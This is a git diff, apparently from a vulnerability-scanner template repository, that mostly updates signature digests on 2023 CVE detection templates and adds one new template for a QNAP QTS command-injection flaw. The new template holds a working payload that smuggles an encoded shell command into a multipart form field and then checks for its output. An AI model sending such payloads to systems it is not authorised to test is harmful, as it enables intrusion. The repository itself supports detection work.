4a0a0047304502200265cbcb6af05e61fad5c3086201ea2c320faf4a231352a2375f2f5b58537fd3022100bc56106b38fa09b709016bfe171871b601e72d08fdf0d3906c7d071c8fb2826a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40355.yaml b/http/cves/2023/CVE-2023-40355.yaml index 300a401ee8..15ebb9b3ec 100644 --- a/http/cves/2023/CVE-2023-40355.yaml +++ b/http/cves/2023/CVE-2023-40355.yaml @@ -48,4 +48,4 @@ http: - 'contains(response, "Axigen")' - 'status_code == 200' condition: and -# digest: 4a0a004730450220183b57c2a71cd7ef299bd414a8937c4136c8b85301e19179a0c81d9e03454d94022100dafbcf2eb06bc385aa209e451c3cde44a73316a406d1ddb139523148c439adbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089d5aa0ce825695bb9ea5e7f7d0ed99275c71b68c467bbc2b7a3f5731ea21a6b0220691c6922540b2937f29bd4712cd7da837b1c42e3305b9aeabc102b8b17c9005d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index d35d881d0f..2c5df20248 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Booking", "Arrival", ">")' condition: and -# digest: 4a0a004730450220591f0dfb7679db835e474070e2c72c00f4c561ebae1908c60fe1b7f473d6b0ea022100d541afc8bf2187a33f7147c5d058aea513b99cacfeb41941d14e54b83e776e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd5abe7b4ecc19617163506032de3f314ba51740ebceebacbe16cca232327bd1022068118d6d2da41b0d087107dd4c56af59e7c93d834106bd2a0e5d2e3e3c64ecfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index 6104f62503..16369ce31e 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -47,4 +47,4 @@ http: part: body words: - "dd556350275e2ee0a2e877cea9c8a74a" -# digest: 4b0a004830460221009e28df007e8d9448fa356a77f97f480556566c8c0ba1b1a43d2a942077f3c4c102210098ec28a7206d3fef9b57ca585dabc004a1038c69b672d8a3f726a7ff567c3f42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202bfc9da42e19e2e2ee3b4774db0a0deed67a87e5115c8868e175566429724498022100ef5913fc5f59bb9dbf437ebb76d6ec44d1e3fff82794bf190909f9e6acd3ec98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 3751c17e62..1404f4d807 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 490a0046304402207d525b2afbb285cc6287801f0b4b16607d59f8e567afe1a1dfaa3bd9b42c7c9d02207a955af3e860bbc3dba477821528e0c312b831d719d598ceea8da18d09e79c23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c72e388d83be779eae11d3636afc409495de936dfa859dff8ff69d9e4dd4a15802207594bec3402c8d72da7fc37222348df75178687c59732812c7b893921365a518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index 3db9327c14..b11311ac6a 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -40,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 4b0a004830460221009f54ee906f166173806edb575f2048996cce056f2845f1b2d6036771d762e86e022100c51ced86a8832bb172ba2e29a61f9af45a88bb3b69194092567534aa0ac3b447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018c2cd802d511a3ec6b3a5e13a8ef5069df64208c7bd9f7ef8fe07e54510f4ef02206d9261b2d4c426dea6831bab220898c4613025136f1f8bed4cdba7e34beb8f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index a1fa4ea6c7..dc51e7ef73 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Enquiry summary", ">")' condition: and -# digest: 4a0a00473045022100f20da08a69a52ea620ace09600305eb4d7aed4b29b860ebd56f1f5b35d871e1702200838d7d9ae4ab1194d9efeea3fba8295ce87745bb2a90f9f5063c46aa806b109:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034beeb12d66272799e9718ec924c454b445020129f3be7e51f27cac48824a99902201586952e2c5671c95203f1e81868eae762c7450bc1aec0dea74dd5bccdd96ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index e7126dc5a0..30a2089b12 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -40,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Passengers", "Drop-off address", ">")' condition: and -# digest: 4a0a0047304502201519d709abefbff5a84eb6fdaf0995a303023eaae597b7c669d66ef0e40f217a022100dce9cd7cded3f7b33e8022d8bb9b2e4a7dfd3cfb687c0bccf32fbc413e83ff4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022014e56b9021d2442982b86a1d21892f238398d218d593b939cf613c4485737f8802205ae68c8fd53c1b5048efba29b99e73f220fdcdc2b85dbdfb6c4418e942d82d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index 90c272bf1f..19d98c6f12 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -48,4 +48,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(header, 'Bad Request') condition: and -# digest: 4a0a00473045022100d9acc92f02e1e2524dc0bbb360981e9cbdbdba6684a0f480ddfd46ae8f89cb68022049eed33651e8f44955abf206c04097495384331f5eff4b36c244c7327a8a360c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df63da243752a7c8ae5b4419c6c0bc3d012438f3aad942de819106d8d7dcad6d022100869cb12653434026c70d72cf0b96cc8bded65bf24f15d64149a11ca8a0ad02f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 52656fd01a..5dfc6e1109 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -43,4 +43,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(body, 'The comparison expression does not consist of three elements') condition: and -# digest: 4a0a00473045022100851e68ac355d57e13ec42c87cb9ace79e3e042531ab6dbc0aede191b6b7c962702201fe2bdf91b293616c1082c911c1e2af6e4a9dcb06aa785c4c4580c76d973d734:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220566ec421ad7c50d5c1ea0f5fc891bbfc4415f305269b368b4415cf400032ab73022100f632ad54d2e5af16208befc75b62c9847e5d9a1fc9fcf40f2f293b0f48e4e243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index 3e45ec1dc3..fc4b94187b 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "google_map_key", "api_key", "auth_domain")' condition: and -# digest: 4a0a0047304502203aab3fa69cd7ef3e594d43aa3fcdf1ad0c184044cae44ab8faa471190db390a2022100d36a134ce30adff06a0a13af3ee41378d30eb71f52355a0f43ec408c321debc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a28b3fde66ec316e5d35e1bf44412d58add66c90225ea0a9fa425fc2828d6f47022100907ceb1d8aa34797e99ee9cc6bc997a324aecc9e2dfd80ee8824de4f81b07ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 52433b1ee1..ee8a50c97c 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022058f4e32c5516f56d07d3b98d6871009c69f9dd1bf92ed7de100e613218a232ed022009683bf30dcacf953053c5fdc85eb69e633de755f741b0c1a3d38214791d010a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205bfba5a589782be2d0036f90503b330fe659ef02b9af5ab8b2f27c84808f9788022074a92f73d65317b9a41a584965fdb4453c17e7ac9d0ae54eb460d3ceff37c0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index c936710be9..23a28e5c27 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -56,4 +56,4 @@ http: part: header words: - "text/html" -# digest: 4a0a0047304502205c2ac454164b4a0d70b114177f05f52edd32bd5abab786ac2714876308c30a50022100a235367c88b7c84ca18ff325c6cd6d64705be572ddc2d32add59a17429bfdf3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2f79dc8a421606bbe12a26b6bcd3651ce312cbeee353eb0058182d1b3926db2022100c22097f0aa51802f172b8c79656b3931df3f2aa0d30b5e94c42bb6c2ff02f400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index 1001939807..d4de9d38ba 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -46,4 +46,4 @@ http: part: body words: - 'Skype' -# digest: 490a0046304402200dec9504eba00a00b9faf7f3cb827a0a77f3f13912088b815d6796b88719b8a302200cb64ac27096ce55753e32cc47ccbaa266e9bce795b3c10f73a288cfd6590d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204d385a1c2eabf2010aab8e2dc414636c821517c645d7f7454d930d398747d67b022100cd62b6a6ce39bd5762d8089f31dc55530c0182275b0fdc256b5ed3300e53e4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42344.yaml b/http/cves/2023/CVE-2023-42344.yaml index 72726656c5..0d26ee5df4 100644 --- a/http/cves/2023/CVE-2023-42344.yaml +++ b/http/cves/2023/CVE-2023-42344.yaml @@ -36,4 +36,4 @@ http: - "root:.*:0:0:" - "invalidArgument" condition: and -# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 069b252f54..2a7e94274f 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -73,4 +73,4 @@ http: regex: - 'value="(.*?)"' internal: true -# digest: 4b0a00483046022100a0a8d6c50952f4effb01060df0202c7d4b82233c3dd026844d87ee050c81df14022100fab5807a55035a6be4eec75621890153266be1927169514cd43d969717d80377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026f4c8ba9cd64942e6b47aeca1ae4c7a0428af0449dd14aef984e0d8c1c6e09302204256a4b88da06f8eee47c94cbde42e81ae16b511b6da5979bd88ea9761bae7f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml index 0e078f1420..4b7c96efa1 100644 --- a/http/cves/2023/CVE-2023-43177.yaml +++ b/http/cves/2023/CVE-2023-43177.yaml @@ -72,4 +72,4 @@ http: - status_code == 200 - contains(body, "crushadmin{{dirname}}") condition: and -# digest: 4a0a004730450221009b4581b4013ca23f2c2021d0434b772242fd85e1462feba94746a596cc9602e702202934c7ebfccdc26b99171d44b3c8d711fe33a308ca4b93b4c6c86477af971df1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100830445e9bba00a117daddfca1259b9ef7a022d6fe27e13f9cb7b40949407bd9c02204a02f01f53e956fcc4b5e30944fd8a5bc1bb49d9f20ff4fb78329f46f5adf916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43187.yaml b/http/cves/2023/CVE-2023-43187.yaml index b14a0509b3..b8a0294b5d 100644 --- a/http/cves/2023/CVE-2023-43187.yaml +++ b/http/cves/2023/CVE-2023-43187.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e736a4b91d9a5543dc1047724e517e9cd38a4f9689172282af50db942356ac96022043459d3163adacf5667a2321c057b5dba15a41328b1f1e0f7ac0c06b0edfceb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220201c4d48716a02d2c66be4a7318bc2ac1dc92830e14b1535590a9c46f12dd8b702207930b8b7e7e95cef77c5f136bcadcbbe6b1dff80070bdf6dad62f0623c96f6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index a0991903fb..8cffbf64dc 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 490a0046304402202d0fc2f9c4e154fa222a473d533ce1d0608dac90a3cae1ce2433953d7227893502205005569ab0903a15ca631fd2c879c3aab9474b696fc4d861a46b828361d5a78d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e377871e2dcf45ea88526dd773225b7426c810ec8d964008e5ae7740b376bbd022100ee2a52abdc80ae957ebaddab106be03f26fd93e09e9f1290a10149d53d6aa2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index af7fc2a046..ee7185587d 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a00473045022027195158b4e4a5bc192a0830824364afd57c0f1e9cd32277079e8dc93e291bc5022100f06e859484d059db04685516d0d3dd41a0f7b70fd1710ed55b6d9877fa9d5591:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210094826e0df08385c1006098c627611803a7a886633321a9b354a9f46b3fe45475022022c5d44415b7bc83f55c50510556c7b4d13feb3317fb5e82ef3fc4fd9eaef1c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index a20341782f..08e6822031 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -80,4 +80,4 @@ http: - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}') - status_code == 200 condition: and -# digest: 4a0a00473045022100ac8ab3f5f82bdb6d41d0b1b21f4d0bf9d48ba57338423040b5fabc3c289d850e02207b5ec0b9a8dbc3677be9cbdd4b31536f0748381b6dfef68d4f28bc96d8796a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082f80177b7581f04212dc0576a4751ee20bdab22835edf2095f77a79c13757720221008fbe8e42bc297fe303de98bdf9b8426e646574e35cf00e0f6481f28a7b6e2bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index 358881f089..efacc220cb 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -54,4 +54,4 @@ http: - "contains(body, 'ColdFusion')" - "contains(header, 'text/html')" condition: and -# digest: 490a00463044022078732d8d6b9d34dde5c9c2bd78a9cbb5b0509d96daa76d3c966b9120471d3908022047672865a3a44c1d46dcef9ef054cfe642fbf8ddfde77e59dce631326ea584e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008fbb590bc361593981c4b4ca8788ce40ec113fa6cb5f66d0494289924511b5a50221008b3fce96d336a94a73797aaec994cc638d7b228ab77ab19cc9a08f89a1d4b9fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index 88c36470b0..de835a8516 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -37,4 +37,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4b0a00483046022100c0120048811fb83ebecffbb6719f67d477615211e68b659469ebdb7431b40067022100c6ff07e3e5dc212222b614b032ea9d6cd73802fb1a34824cc387c398252617d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de148fe4e6242e6abc19d6fe4f2669b68922af5ebaa974d857cab105774563380220725cdbee34b4e77e346808179b3b069fc13c9ddd462fc0c2e4d0ead40654f5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index 666da1df9f..c5b8633606 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -35,4 +35,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 404' condition: and -# digest: 4b0a00483046022100cba5c4d12e50a528bb189f495e3c9da2618e5180146b4624cd3997b834063fe60221009b11601e94531407edaa7ee1e9dfb799e2167598089b2ddcdac99db6d1c3736f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072f73c6b300dc9b4e94b56e4753b236e144171f0420af4af0c13097305edae9e02206f5f7b3429e24d9476d31c541f16ad723124a4d8759358b86c67b9e96043b3e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 13d7e43ec8..051ed6b3d3 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -45,4 +45,4 @@ http: - 'contains_all(header, "application/json")' - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")' condition: and -# digest: 490a0046304402202ee11b445730a11487beac586a250e3e5ac3e343b35612f67f4abb0c254ce653022073ace0b612ed4c38fc8353b59528a7024a4575c7367bf7a8eb2f66faa81bc75d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210081c3ca1a9aa062b68de5767bf7196688722aa953aa66d1d2cb1bdc3f923cbe83022100d963ef7152e0de5b68eb3b89bfd22b0989532ba9aa9a5682f2e08f7f39c0c4ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 6570863c95..91e3ac4e08 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -49,4 +49,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a004630440220192d54501756f1478ac65ab903c7a3c954812e6b0a31555659c286dde3921da802206c1dcb2fa566cae4365cf1def30637a290169acd5a13458386792ba8d911b5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e549b41871d31392747cdd52ed45cbab5066b928e541fe6d1cd3e586fd1e3d0402205038b8281f90eead08d25ddf1e5281bf5dfd5463c328381896bd01903596e39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index eb87ea6e13..7406de95e5 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d33d6edf11d64d437481bf89eaaeec0b40325418a87df61d5acdbd7140e508f0022100d5d876ac316160a695e79c28395c7ad9b26c6e816456b7fb5a4c23e5a472482b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cec6143c8e148bcc11dd54548c3052458b343eb437ff02989f587d6b10a8ef100220443a97a1f7f060d356652fa2ee6c51d593fba94809abfbec6d342e6db08e8167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index a2d91c714e..d7ded59e4a 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -103,4 +103,4 @@ http: - "commandResult" - "uid=" condition: and -# digest: 4a0a00473045022033c471aa0662debb0b0a8734eaca1842dc9db829007d9ea373f6bd91d10a71f9022100cf8be93a7f0afb60a38e658f4081ef8464742ef93dabbd4eedda3a3dbb2f2faf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200631280cc82577d9f04af6a40e44cc38fb51e389f5af5a180e0e4eda44442ef102210091b6ea9b756def972bfe043e90ead64bddc58fbdaf68ccec09743b77a0a2883e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index a46bdbca9a..9cf94669f8 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "block_message")' - 'contains(header_2, "application/json")' condition: and -# digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ecd050c196cc17a960bbe78b7217a1d0bbdf94d05261a528f992427117b470002206a36cafa1a82caa7f5dcaf43f9abaa55438c280dbdb67df57eaab83abc12ebc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml index fc6edc7c1c..3eb22ac278 100644 --- a/http/cves/2023/CVE-2023-47115.yaml +++ b/http/cves/2023/CVE-2023-47115.yaml @@ -93,4 +93,4 @@ http: - "contains(header, 'text/html')" - 'contains(body, "")' condition: and -# digest: 4a0a004730450221008999745df0370a0f36f1d91079345bb01c335595f037e4fd623dd2ff3a725d6c02200997bd78ea3074a15dd1d76378aa1cf7d1286e84d5d7282642e400804ab42ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa945f4d7cfc24ccc7b7a8f60b7f6330657b9143527d8c1a0d1c30afb5798fd80220611e10519bf2fd4257bf6911993b35e94fcacb89b616f16f50b98606dda06dac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index a0a85b18fb..0992e66fc7 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -52,4 +52,4 @@ http: part: body regex: - 'key: "([a-z_A-Z0-9]+)"' -# digest: 4a0a004730450220289b3208867579b1cfc1d6e1c2bf8cc5ffd7bb4fe3214f11a65a16e70948221f0221009e2794bd2b32e5bc963b223d45602ce11062bcbd8434e141c4743f302be772b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207eb10bbaaa9606985258a5fcc9285e6588b5043561e22bf71d534354f33b32d1022100f2f9202c1144fa3549e6f9370b54451d794f24d2cf391fdc9a83fbb2fb76db55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index 2c34225ec4..deccc8b7f6 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -114,4 +114,4 @@ http: regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true -# digest: 490a0046304402202ab5e43788b22426d622a11c94b81914ccbdc4ada41c87ef07b01c225cf38d210220375e9f5c973fb6b9bc61e4c8991f810dfbb15318285ea59eb8147d0c5fbd5264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065e6f603f0e38ded5d6d7d64b26a3c4f033fe991d1b0bd52647d1f06a8b848de02204921a44eff428087946e64109d72ce0cb050c7167e6d3b2fa2eded319790416b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47218.yaml b/http/cves/2023/CVE-2023-47218.yaml new file mode 100644 index 0000000000..ca420a4377 --- /dev/null +++ b/http/cves/2023/CVE-2023-47218.yaml @@ -0,0 +1,54 @@ +id: CVE-2023-47218 + +info: + name: QNAP QTS and QuTS Hero - OS Command Injection + author: ritikchaddha + severity: high + description: | + An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later. + reference: + - https://github.com/passwa11/CVE-2023-47218 + - https://twitter.com/win3zz/status/1760224052289888668/photo/3 + - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-47218 + classification: + cvss-metrics: CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.3 + cwe-id: CWE-78 + cve-id: CVE-2023-47218 + metadata: + verified: true + max-request: 2 + shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS" + tags: cve,cve2023,qnap,qts,quts,rce,intrusive + +variables: + file: '{{rand_base(6)}}' + cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22' + +http: + - raw: + - | + POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary="avssqwfz" + + --avssqwfz + Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}" + Content-Type: text/plain + + skfqduny + --avssqwfz– + + - | + POST /cgi-bin/quick/{{file}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body_1, "code\": 200", "full_path_filename success")' + - 'contains_all(body_2, "uid=", "gid=")' + - 'status_code == 200' + condition: and +# digest: 490a0046304402207c91f6f27dabb2e8ec3158c1c5677a2697bf0aac61c9f7fc4f5809796f63aa65022019831152413abfd5beccfb0ff90a9c194a5ac90dec6f7b4f781be1a395042786:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index 0640164ca7..44cfc8776b 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -50,4 +50,4 @@ http: - type: dsl dsl: - "contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200" -# digest: 490a00463044022041e988922c0f099939d178017ca0f05a58aecd21af3e4b01292581e5393c15cc02203c4023bc12f52f38550dad736256fe2b8ca2a5840bd1191998473a8612f03c37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003e7cfbeaa7a27cda4e39ced19bbf29d6114eb4e89c148c4d8f8956a1fc8796b022100dadf8e853bb7b440bac6e0475e4644ee0df1cd1950b066f615e41d2202000f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 